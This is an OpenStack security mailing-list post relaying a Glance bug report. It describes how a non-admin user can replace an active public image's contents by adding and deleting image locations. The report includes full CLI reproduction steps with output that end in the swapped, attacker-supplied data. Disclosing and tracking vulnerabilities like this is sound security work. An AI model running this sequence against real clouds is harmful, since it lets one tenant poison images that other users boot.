[Openstack-security] [Bug 1549483] Re: Normal user can replace active image data if show_multiple_locations has been set to true
Jeremy Stanley
fungi at yuggoth.org
Thu Feb 9 14:34:52 UTC 2017
** Tags added: security
--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1549483
Title:
Normal user can replace active image data if show_multiple_locations
has been set to true
Status in Glance:
Confirmed
Status in OpenStack Security Advisory:
Opinion
Status in OpenStack Security Notes:
Fix Released
Bug description:
Some time ago there was a security bug
https://bugs.launchpad.net/glance/+bug/1525915 and a patch was
proposed and merged in Glance repo. Unfortunately it partially fixed
the problem and the issue with immutability still exists.
Bug description:
User (non admin) can change image data by updating location for image when "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows malicious user to replace data after image activation.
mfedosin at wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-11-10T18:41:53Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
mfedosin at wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:21Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
mfedosin at wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin at wdev:~$ cat ooo
I'm really good image.
mfedosin at wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:29Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
mfedosin at wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
mfedosin at wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin at wdev:~$ cat ooo
All your base are belong to us! Muahahaha!
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1549483/+subscriptions
More information about the Openstack-security
mailing list